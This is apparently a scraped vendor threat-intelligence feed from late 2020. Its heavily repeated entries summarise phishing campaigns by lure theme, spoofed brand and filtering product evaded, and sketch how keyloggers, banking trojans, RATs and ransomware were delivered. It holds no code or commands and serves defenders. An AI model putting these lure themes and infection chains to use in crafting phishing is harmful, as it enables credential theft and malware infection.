PHISHING EXAMPLE DESCRIPTION: Copyright Violation-themed emails found in environments protected by Proofpoint and Microsoft ATP deliver Makop ransomware via an ALZ attachment.

Real Phishing Example: TNT-spoofing emails found in environments protected by TrendMicro deliver Agent Tesla keylogger via embedded links. The embedded links download an archive that contains an Agent Tesla keylogger executable.

ENVIRONMENTS: TrendMicro

TYPE: Keylogger

POSTED ON: 12/09/2020

TACTIC: URL Link

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: TNT-spoofing emails found in environments protected by TrendMicro deliver Agent Tesla keylogger via embedded links. The embedded links download an archive that contains an Agent Tesla keylogger executable.

Real Phishing Example: Finance-themed emails found in environments protected by O365-ATP and TrendMicro deliver Agent Tesla keylogger via embedded links. The embedded links download a VBS script that downloads a Powershell script which drops and runs an Agent Tesla binary.

ENVIRONMENTS: TrendMicro

TYPE: Keylogger

POSTED ON: 12/09/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by O365-ATP and TrendMicro deliver Agent Tesla keylogger via embedded links. The embedded links download a VBS script that downloads a Powershell script which drops and runs an Agent Tesla binary.

Real Phishing Example: Finance-themed emails found in environments protected by O365-ATP and TrendMicro deliver Agent Tesla keylogger via embedded links. The embedded links download a VBS script that downloads a Powershell script which drops and runs an Agent Tesla binary.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Keylogger

POSTED ON: 12/09/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by O365-ATP and TrendMicro deliver Agent Tesla keylogger via embedded links. The embedded links download a VBS script that downloads a Powershell script which drops and runs an Agent Tesla binary.

Real Phishing Example: Finance-themed emails found in environments protected by Ironport, O365-ATP, Mimecast, Proofpoint, and Symantec deliver Dridex via Office macro-laden documents downloaded from embedded links.

ENVIRONMENTS: Cisco Ironport

TYPE: Trojan

POSTED ON: 12/09/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Ironport, O365-ATP, Mimecast, Proofpoint, and Symantec deliver Dridex via Office macro-laden documents downloaded from embedded links.

Real Phishing Example: Finance-themed emails found in environments protected by Ironport, O365-ATP, Mimecast, Proofpoint, and Symantec deliver Dridex via Office macro-laden documents downloaded from embedded links.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Trojan

POSTED ON: 12/09/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Ironport, O365-ATP, Mimecast, Proofpoint, and Symantec deliver Dridex via Office macro-laden documents downloaded from embedded links.

Real Phishing Example: Finance-themed emails found in environments protected by Ironport, O365-ATP, Mimecast, Proofpoint, and Symantec deliver Dridex via Office macro-laden documents downloaded from embedded links.

ENVIRONMENTS: Mimecast

TYPE: Trojan

POSTED ON: 12/09/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Ironport, O365-ATP, Mimecast, Proofpoint, and Symantec deliver Dridex via Office macro-laden documents downloaded from embedded links.

Real Phishing Example: Finance-themed emails found in environments protected by Ironport, O365-ATP, Mimecast, Proofpoint, and Symantec deliver Dridex via Office macro-laden documents downloaded from embedded links.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 12/09/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Ironport, O365-ATP, Mimecast, Proofpoint, and Symantec deliver Dridex via Office macro-laden documents downloaded from embedded links.

Real Phishing Example: Finance-themed emails found in environments protected by Ironport, O365-ATP, Mimecast, Proofpoint, and Symantec deliver Dridex via Office macro-laden documents downloaded from embedded links.

ENVIRONMENTS: Symantec

TYPE: Trojan

POSTED ON: 12/09/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Ironport, O365-ATP, Mimecast, Proofpoint, and Symantec deliver Dridex via Office macro-laden documents downloaded from embedded links.

Real Phishing Example: Bank-spoofing emails found in environments protected by Proofpoint deliver an Agent Tesla Keylogger binary in an attached .iso archive.
Note: these are in German.

ENVIRONMENTS: Proofpoint

TYPE: Keylogger

POSTED ON: 12/08/2020

TACTIC: Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Bank-spoofing emails found in environments protected by Proofpoint deliver an Agent Tesla Keylogger binary in an attached .iso archive. Note: these are in German.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint and Ironport deliver credential phishing via an attached HTM file.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 12/07/2020

TACTIC: Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint and Ironport deliver credential phishing via an attached HTM file.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint and Ironport deliver credential phishing via an attached HTM file.

ENVIRONMENTS: Cisco Ironport

TYPE: Credential Phish

POSTED ON: 12/07/2020

TACTIC: Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint and Ironport deliver credential phishing via an attached HTM file.

Real Phishing Example: Enel Energia-spoofing emails found in environments protected by Proofpoint deliver the banking trojan Ursnif via attached Office macro-laden spreadsheets.
Note: these are in Italian; Cofense saw approximately 200 of these as a large-scale campaign found in environments protected by Proofpoint.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 12/01/2020

TACTIC: Attachment

THEME: Enel Energia

PHISHING EXAMPLE DESCRIPTION: Enel Energia-spoofing emails found in environments protected by Proofpoint deliver the banking trojan Ursnif via attached Office macro-laden spreadsheets. Note: these are in Italian; Cofense saw approximately 200 of these as a large-scale campaign found in environments protected by Proofpoint.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint deliver NanoCore RAT via embedded links. The embedded Dropbox links download a .Z archive that contains a NanoCore RAT executable.

ENVIRONMENTS: Proofpoint

TYPE: RAT

POSTED ON: 12/01/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint deliver NanoCore RAT via embedded links. The embedded Dropbox links download a .Z archive that contains a NanoCore RAT executable.

Real Phishing Example: Inquiry-themed emails found in environments protected by Proofpoint deliver Agent Tesla keylogger via embedded links. The embedded Onedrive links download a .RAR archive that contains an Agent Tesla executable.

ENVIRONMENTS: Proofpoint

TYPE: Keylogger

POSTED ON: 12/01/2020

TACTIC: URL Link

THEME: Inquiry

PHISHING EXAMPLE DESCRIPTION: Inquiry-themed emails found in environments protected by Proofpoint deliver Agent Tesla keylogger via embedded links. The embedded Onedrive links download a .RAR archive that contains an Agent Tesla executable.

Real Phishing Example: Shipping-themed emails found in environments protected by Cisco Ironport deliver Mass Logger via attached XZ archives. The XZ archives contain a Mass Logger binary.

ENVIRONMENTS: Cisco Ironport

TYPE: Keylogger

POSTED ON: 11/30/2020

TACTIC: Attachment

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: Shipping-themed emails found in environments protected by Cisco Ironport deliver Mass Logger via attached XZ archives. The XZ archives contain a Mass Logger binary.

Real Phishing Example: Finance-themed emails found in environments protected by O365-ATP and Proofpoint deliver the banking trojan Dridex via Office macro-laden documents downloaded from embedded links.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 11/30/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by O365-ATP and Proofpoint deliver the banking trojan Dridex via Office macro-laden documents downloaded from embedded links.

Real Phishing Example: Finance-themed emails found in environments protected by O365-ATP and Proofpoint deliver the banking trojan Dridex via Office macro-laden documents downloaded from embedded links.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Trojan

POSTED ON: 11/30/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by O365-ATP and Proofpoint deliver the banking trojan Dridex via Office macro-laden documents downloaded from embedded links.

Real Phishing Example: Coronavirus-themed emails spoofing Kearney & Company, found in environments protected by Cisco Ironport, deliver credential phishing.

ENVIRONMENTS: Cisco Ironport

TYPE: Credential Phish

POSTED ON: 11/25/2020

TACTIC: URL Link

THEME: Coronavirus

PHISHING EXAMPLE DESCRIPTION: Coronavirus-themed emails spoofing Kearney & Company, found in environments protected by Cisco Ironport, deliver credential phishing.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint and Mimecast deliver credential phishing via embedded links. The embedded links redirect to the phishing URL that harvests email login credentials.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 11/18/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint and Mimecast deliver credential phishing via embedded links. The embedded links redirect to the phishing URL that harvests email login credentials.

Real Phishing Example: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via embedded links. The embedded links redirect to the phishing URL that harvests email login credentials.
Note: They were made to look like a Dropbox document notification.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 11/18/2020

TACTIC: URL Link

THEME: Notification

PHISHING EXAMPLE DESCRIPTION: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via embedded links. The embedded links redirect to the phishing URL that harvests email login credentials. Note: They were made to look like a Dropbox document notification.

Real Phishing Example: Order-themed emails found in environments protected by Proofpoint deliver AZORult Stealer via attached password protected RAR archives. The RAR archive contains a GuLoader executable that downloads and runs an AZORult binary.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 11/18/2020

TACTIC: Attachment

THEME: Order

PHISHING EXAMPLE DESCRIPTION: Order-themed emails found in environments protected by Proofpoint deliver AZORult Stealer via attached password protected RAR archives. The RAR archive contains a GuLoader executable that downloads and runs an AZORult binary.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint and Mimecast deliver credential phishing via embedded links. The embedded links redirect to the phishing URL that harvests email login credentials.

ENVIRONMENTS: Mimecast

TYPE: Credential Phish

POSTED ON: 11/18/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint and Mimecast deliver credential phishing via embedded links. The embedded links redirect to the phishing URL that harvests email login credentials.

Real Phishing Example: File Transfer-themed emails found in an environment protected by Symantec deliver Agent Tesla Keylogger. An embedded Mediafire link downloads a TGZ archive that contains an Agent Tesla executable.

ENVIRONMENTS: Symantec

TYPE: Credential Phish

POSTED ON: 11/16/2020

TACTIC: URL Link

THEME: File Transfer

PHISHING EXAMPLE DESCRIPTION: File Transfer-themed emails found in an environment protected by Symantec deliver Agent Tesla Keylogger. An embedded Mediafire link downloads a TGZ archive that contains an Agent Tesla executable.

Real Phishing Example: Emails found in environments protected by Mimecast and Cisco Ironport, claiming to be Intuit QuickBooks invoices from various companies, deliver a .WSF script via an embedded URL. The .WSF script then downloads a .VBS script, which downloads JSSLoader.

ENVIRONMENTS: Cisco Ironport

TYPE: Credential Phish

POSTED ON: 11/13/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Emails found in environments protected by Mimecast and Cisco Ironport, claiming to be Intuit QuickBooks invoices from various companies, deliver a .WSF script via an embedded URL. The .WSF script then downloads a .VBS script, which downloads JSSLoader.

Real Phishing Example: Emails found in environments protected by Mimecast and Cisco Ironport, claiming to be Intuit QuickBooks invoices from various companies, deliver a .WSF script via an embedded URL. The .WSF script then downloads a .VBS script, which downloads JSSLoader.

ENVIRONMENTS: Mimecast

TYPE: Credential Phish

POSTED ON: 11/13/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Emails found in environments protected by Mimecast and Cisco Ironport, claiming to be Intuit QuickBooks invoices from various companies, deliver a .WSF script via an embedded URL. The .WSF script then downloads a .VBS script, which downloads JSSLoader.

Real Phishing Example: Microsoft-spoofing emails found in environments protected by Symantec and O365-ATP deliver credential phishing via embedded URLs.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 11/11/2020

TACTIC: URL Link

THEME: Microsoft

PHISHING EXAMPLE DESCRIPTION: Microsoft-spoofing emails found in environments protected by Symantec and O365-ATP deliver credential phishing via embedded URLs.

Real Phishing Example: Microsoft-spoofing emails found in environments protected by Symantec and O365-ATP deliver credential phishing via embedded URLs.

ENVIRONMENTS: Symantec

TYPE: Credential Phish

POSTED ON: 11/11/2020

TACTIC: URL Link

THEME: Microsoft

PHISHING EXAMPLE DESCRIPTION: Microsoft-spoofing emails found in environments protected by Symantec and O365-ATP deliver credential phishing via embedded URLs.

Real Phishing Example: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via embedded links. The embedded links download a PDF file that contains a link that leads to a credential phishing landing page. The PDF was hosted and downloaded from Sharepoint.
Note: this campaign is in Dutch.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 11/11/2020

TACTIC: URL Link

THEME: Notification

PHISHING EXAMPLE DESCRIPTION: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via embedded links. The embedded links download a PDF file that contains a link that leads to a credential phishing landing page. The PDF was hosted and downloaded from Sharepoint. Note: this campaign is in Dutch.

Real Phishing Example: Courier-spoofed emails found in environments protected by Proofpoint deliver Agent Tesla keylogger via embedded links. The embedded links download a TGZ archive that contains an Agent Tesla keylogger executable. The payload was hosted and downloaded from OneDrive.
Note: this campaign is in Romanian.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 11/10/2020

TACTIC: URL Link

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: Courier-spoofed emails found in environments protected by Proofpoint deliver Agent Tesla keylogger via embedded links. The embedded links download a TGZ archive that contains an Agent Tesla keylogger executable. The payload was hosted and downloaded from OneDrive. Note: this campaign is in Romanian.

Real Phishing Example: Purchase order-themed emails found in environments protected by Proofpoint deliver Agent Tesla keylogger via embedded links. The embedded links download an ISO archive that contains an Agent Tesla keylogger executable.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 11/09/2020

TACTIC: URL Link

THEME: Purchase Order

PHISHING EXAMPLE DESCRIPTION: Purchase order-themed emails found in environments protected by Proofpoint deliver Agent Tesla keylogger via embedded links. The embedded links download an ISO archive that contains an Agent Tesla keylogger executable.

Real Phishing Example: Document-themed emails found in environments protected by O365-ATP and Mimecast deliver credential phishing via embedded links.

ENVIRONMENTS: Mimecast

TYPE: Credential Phish

POSTED ON: 11/09/2020

TACTIC: URL Link

THEME: Document

PHISHING EXAMPLE DESCRIPTION: Document-themed emails found in environments protected by O365-ATP and Mimecast deliver credential phishing via embedded links.

Real Phishing Example: Document-themed emails found in environments protected by O365-ATP and Mimecast deliver credential phishing via embedded links.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 11/09/2020

TACTIC: URL Link

THEME: Document

PHISHING EXAMPLE DESCRIPTION: Document-themed emails found in environments protected by O365-ATP and Mimecast deliver credential phishing via embedded links.

Real Phishing Example: Finance-themed emails found in environments protected by Mimecast deliver credential phishing via embedded links.

ENVIRONMENTS: Mimecast

TYPE: Credential Phish

POSTED ON: 11/09/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Mimecast deliver credential phishing via embedded links.

Real Phishing Example: Document-themed emails found in environments protected by O365-ATP deliver credential phishing via embedded links.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 11/09/2020

TACTIC: URL Link

THEME: Document

PHISHING EXAMPLE DESCRIPTION: Document-themed emails found in environments protected by O365-ATP deliver credential phishing via embedded links.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint deliver Agent Tesla Keylogger via embedded URLs. Note: These emails are in Spanish.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 11/04/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint deliver Agent Tesla Keylogger via embedded URLs. Note: These emails are in Spanish.

Real Phishing Example: USPS-spoofing emails found in environments protected by Proofpoint deliver Quaverse Remote Access Trojan via embedded Onedrive URLs.

ENVIRONMENTS: Proofpoint

TYPE: RAT

POSTED ON: 11/03/2020

TACTIC: URL Link

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: USPS-spoofing emails found in environments protected by Proofpoint deliver Quaverse Remote Access Trojan via embedded Onedrive URLs.

Real Phishing Example: Coronavirus-themed emails found in an environment protected by Microsoft ATP deliver Hentai Onichan ransomware dropped via HTML files downloaded from embedded URLs. This new variant of the Hentai Onichan ransomware known as King Engine exfiltrates data to an email address.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Ransomware

POSTED ON: 11/03/2020

TACTIC: URL Link

THEME: Coronavirus

PHISHING EXAMPLE DESCRIPTION: Coronavirus-themed emails found in an environment protected by Microsoft ATP deliver Hentai Onichan ransomware dropped via HTML files downloaded from embedded URLs. This new variant of the Hentai Onichan ransomware known as King Engine exfiltrates data to an email address.

Real Phishing Example: Notification-themed emails found in an environment protected by Proofpoint deliver Agent Tesla keylogger via embedded URLs. The embedded URLs download a GZ archive that contains an Agent Tesla executable.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 11/02/2020

TACTIC: URL Link

THEME: Notification

PHISHING EXAMPLE DESCRIPTION: Notification-themed emails found in an environment protected by Proofpoint deliver Agent Tesla keylogger via embedded URLs. The embedded URLs download a GZ archive that contains an Agent Tesla executable.

Real Phishing Example: WeTransfer-spoofing emails found in an environment protected by Symantec deliver Ave_Maria stealer via embedded URLs. The embedded URLs download a RAR archive that contains an Ave_Maria executable.

ENVIRONMENTS: Symantec

TYPE: Credential Phish

POSTED ON: 11/02/2020

TACTIC: URL Link

THEME: File Transfer

PHISHING EXAMPLE DESCRIPTION: WeTransfer-spoofing emails found in an environment protected by Symantec deliver Ave_Maria stealer via embedded URLs. The embedded URLs download a RAR archive that contains an Ave_Maria executable.

Real Phishing Example: Coronavirus-themed emails found in environments protected by Cisco Ironport deliver Hentai OniChan Ransomware via embedded URLs. The embedded URL downloads a password protected RAR archive that contains a DotNETLoader that downloads and runs the ransomware.

ENVIRONMENTS: Cisco Ironport

TYPE: Ransomware

POSTED ON: 10/30/2020

TACTIC: URL Link

THEME: Coronavirus

PHISHING EXAMPLE DESCRIPTION: Coronavirus-themed emails found in environments protected by Cisco Ironport deliver Hentai OniChan Ransomware via embedded URLs. The embedded URL downloads a password protected RAR archive that contains a DotNETLoader that downloads and runs the ransomware.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint deliver Remcos RAT via XXE attachments. The XXE archive contains a GuLoader executable that downloads and runs Remcos RAT.

ENVIRONMENTS: Proofpoint

TYPE: RAT

POSTED ON: 10/30/2020

TACTIC: XXE Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint deliver Remcos RAT via XXE attachments. The XXE archive contains a GuLoader executable that downloads and runs Remcos RAT.

Real Phishing Example: Shipping-spoofing emails found in environments protected by Proofpoint deliver Banload via an embedded URL. Banload then downloads LatentBot.
Note: These emails are in Italian.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 10/30/2020

TACTIC: URL Link

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: Shipping-spoofing emails found in environments protected by Proofpoint deliver Banload via an embedded URL. Banload then downloads LatentBot. Note: These emails are in Italian.

Real Phishing Example: Nexus Shipping-spoofing emails found in environments protected by Proofpoint deliver Loki Bot via an attached CVE-2017-0199 open XML exploit. The CVE-2017-0199 exploit downloads and runs a DOC file that exploits CVE-2017-11882 to download and run Loki Bot.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 10/30/2020

TACTIC: Attachment

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: Nexus Shipping-spoofing emails found in environments protected by Proofpoint deliver Loki Bot via an attached CVE-2017-0199 open XML exploit. The CVE-2017-0199 exploit downloads and runs a DOC file that exploits CVE-2017-11882 to download and run Loki Bot.

Real Phishing Example: Response-themed emails found in environments protected by Proofpoint deliver QakBot via malicious Office macros downloaded from an embedded URL.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 10/30/2020

TACTIC: URL Link

THEME: Response

PHISHING EXAMPLE DESCRIPTION: Response-themed emails found in environments protected by Proofpoint deliver QakBot via malicious Office macros downloaded from an embedded URL.

Real Phishing Example: Finance or Termination-themed emails found in environments protected by O365-ATP and Mimecast deliver BazarBackdoor via embedded links.

ENVIRONMENTS: Mimecast

TYPE: Trojan

POSTED ON: 10/27/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance or Termination-themed emails found in environments protected by O365-ATP and Mimecast deliver BazarBackdoor via embedded links.

Real Phishing Example: Finance or Termination-themed emails found in environments protected by O365-ATP and Mimecast deliver BazarBackdoor via embedded links.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Trojan

POSTED ON: 10/27/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance or Termination-themed emails found in environments protected by O365-ATP and Mimecast deliver BazarBackdoor via embedded links.

Real Phishing Example: Systel Inc-spoofing emails found in environments protected by Proofpoint deliver Credential Phishing via embedded Canva links. The embedded Canva links redirect to phishing URLs that harvest email login credentials.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 10/23/2020

TACTIC: URL Link

THEME: Canva

PHISHING EXAMPLE DESCRIPTION: Systel Inc-spoofing emails found in environments protected by Proofpoint deliver Credential Phishing via embedded Canva links. The embedded Canva links redirect to phishing URLs that harvest email login credentials.

Real Phishing Example: Systel Inc-spoofing emails found in environments protected by O365-ATP deliver Credential Phishing via embedded Canva links. The embedded Canva links redirect to phishing URLs that harvest email login credentials.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 10/23/2020

TACTIC: URL Link

THEME: Canva

PHISHING EXAMPLE DESCRIPTION: Systel Inc-spoofing emails found in environments protected by O365-ATP deliver Credential Phishing via embedded Canva links. The embedded Canva links redirect to phishing URLs that harvest email login credentials.

Real Phishing Example: Invoice-themed emails found in environments protected by Cisco Ironport deliver ZLoader via XLS attachments. The attached Office macros download and run a ZLoader binary.

ENVIRONMENTS: Cisco Ironport

TYPE: Malware

POSTED ON: 10/23/2020

TACTIC: XLS Attachment

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: Invoice-themed emails found in environments protected by Cisco Ironport deliver ZLoader via XLS attachments. The attached Office macros download and run a ZLoader binary.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint deliver Remcos RAT via XXE attachments. The XXE archive contains a GuLoader executable that downloads and runs Remcos RAT.

ENVIRONMENTS: Proofpoint

TYPE: RAT

POSTED ON: 10/23/2020

TACTIC: XXE Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint deliver Remcos RAT via XXE attachments. The XXE archive contains a GuLoader executable that downloads and runs Remcos RAT.

Real Phishing Example: Invoice-themed emails found in environments protected by Mimecast deliver Credential Phishing via embedded links. The embedded links download a ZIP archive that contains another ZIP archive with an HTML file inside. The HTML file harvests email login credentials.

ENVIRONMENTS: Mimecast

TYPE: Credential Phish

POSTED ON: 10/23/2020

TACTIC: URL Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: Invoice-themed emails found in environments protected by Mimecast deliver Credential Phishing via embedded links. The embedded links download a ZIP archive that contains another ZIP archive with an HTML file inside. The HTML file harvests email login credentials.

Real Phishing Example: Invoice-themed emails found in environments protected by O365-ATP deliver Credential Phishing via embedded links. The embedded links download a ZIP archive that contains another ZIP archive with an HTML file inside. The HTML file harvests email login credentials.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 10/23/2020

TACTIC: URL Link

THEME: Invoice

PHISHING EXAMPLE DESCRIPTION: Invoice-themed emails found in environments protected by O365-ATP deliver Credential Phishing via embedded links. The embedded links download a ZIP archive that contains another ZIP archive with an HTML file inside. The HTML file harvests email login credentials.

Real Phishing Example: Response-themed emails found in environments protected by O365-ATP deliver Emotet/Geodo via embedded links. The embedded links download an Office Macro document that downloads and runs an Emotet/Geodo executable.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 10/23/2020

TACTIC: URL Link

THEME: Response

PHISHING EXAMPLE DESCRIPTION: Response-themed emails found in environments protected by O365-ATP deliver Emotet/Geodo via embedded links. The embedded links download an Office Macro document that downloads and runs an Emotet/Geodo executable.

Real Phishing Example: Response-themed emails found in environments protected by Cisco Ironport deliver Emotet/Geodo via embedded links. The embedded links download an Office Macro document that downloads and runs an Emotet/Geodo executable.

ENVIRONMENTS: Cisco Ironport

TYPE: Credential Phish

POSTED ON: 10/23/2020

TACTIC: URL Link

THEME: Response

PHISHING EXAMPLE DESCRIPTION: Response-themed emails found in environments protected by Cisco Ironport deliver Emotet/Geodo via embedded links. The embedded links download an Office Macro document that downloads and runs an Emotet/Geodo executable.

Real Phishing Example: Finance-themed emails found in environments protected by Cisco Ironport deliver Pyrogenic stealer via embedded links. The embedded links download a Pyrogenic stealer binary.

ENVIRONMENTS: Cisco Ironport

TYPE: Credential Phish

POSTED ON: 10/23/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Cisco Ironport deliver Pyrogenic stealer via embedded links. The embedded links download a Pyrogenic stealer binary.

Real Phishing Example: Maersk-spoofing emails found in environments protected by Proofpoint deliver Agent Tesla keylogger via embedded Dropbox links. The embedded links download a RAR archive that contains an Agent Tesla executable.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 10/23/2020

TACTIC: URL Link

THEME: Shipping

PHISHING EXAMPLE DESCRIPTION: Maersk-spoofing emails found in environments protected by Proofpoint deliver Agent Tesla keylogger via embedded Dropbox links. The embedded links download a RAR archive that contains an Agent Tesla executable.

Real Phishing Example: Finance-themed emails were seen within O365-ATP environments delivering Remcos RAT via a GuLoader binary attached in an .xxe archive.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: RAT

POSTED ON: 10/16/2020

TACTIC: XXE Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails were seen within O365-ATP environments delivering Remcos RAT via a GuLoader binary attached in an .xxe archive.

Real Phishing Example: Finance-themed emails were seen within Proofpoint environments delivering Remcos RAT via a GuLoader binary attached in an .xxe archive.

ENVIRONMENTS: Proofpoint

TYPE: RAT

POSTED ON: 10/16/2020

TACTIC: XXE Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails were seen within Proofpoint environments delivering Remcos RAT via a GuLoader binary attached in an .xxe archive.

Real Phishing Example: Finance-themed emails were seen within an O365-ATP environment delivering Agent Tesla Keylogger via embedded URLs.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 10/16/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails were seen within an O365-ATP environment delivering Agent Tesla Keylogger via embedded URLs.

Real Phishing Example: Finance-themed emails in Proofpoint environments to deliver Pyrogenic Stealer via embedded URLs.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 10/16/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails in Proofpoint environments to deliver Pyrogenic Stealer via embedded URLs.

Real Phishing Example: Finance-themed emails in Proofpoint environments to deliver an attached HTML file. When opened, the HTML file drops an archive containing jRAT.

ENVIRONMENTS: Proofpoint

TYPE: RAT

POSTED ON: 10/16/2020

TACTIC: HTM Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails in Proofpoint environments to deliver an attached HTML file. When opened, the HTML file drops an archive containing jRAT.

Real Phishing Example: Finance-themed campaign in O365-ATP environments to deliver FormGrabber via GuLoader, which is downloaded via embedded links.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Trojan

POSTED ON: 10/16/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed campaign in O365-ATP environments to deliver FormGrabber via GuLoader, which is downloaded via embedded links.

Real Phishing Example: Emails themed around employment termination due to COVID-19 or an annual bonus, seen in Symantec environments, deliver PDF documents via embedded URLs. The PDF documents contain links to download BazarBackdoor.

ENVIRONMENTS: Symantec

TYPE: Trojan

POSTED ON: 10/16/2020

TACTIC: URL Link

THEME: Employment Termination

PHISHING EXAMPLE DESCRIPTION: Emails themed around employment termination due to COVID-19 or an annual bonus, seen in Symantec environments, deliver PDF documents via embedded URLs. The PDF documents contain links to download BazarBackdoor.

Real Phishing Example: Emails themed around employment termination due to COVID-19 or an annual bonus, seen in O365-ATP environments, deliver PDF documents via embedded URLs. The PDF documents contain links to download BazarBackdoor.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Trojan

POSTED ON: 10/16/2020

TACTIC: URL Link

THEME: Employment Termination

PHISHING EXAMPLE DESCRIPTION: Emails themed around employment termination due to COVID-19 or an annual bonus, seen in O365-ATP environments, deliver PDF documents via embedded URLs. The PDF documents contain links to download BazarBackdoor.

Real Phishing Example: Emails themed around employment termination due to COVID-19 or an annual bonus, seen in Proofpoint environments, deliver PDF documents via embedded URLs. The PDF documents contain links to download BazarBackdoor.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 10/16/2020

TACTIC: URL Link

THEME: Employment Termination

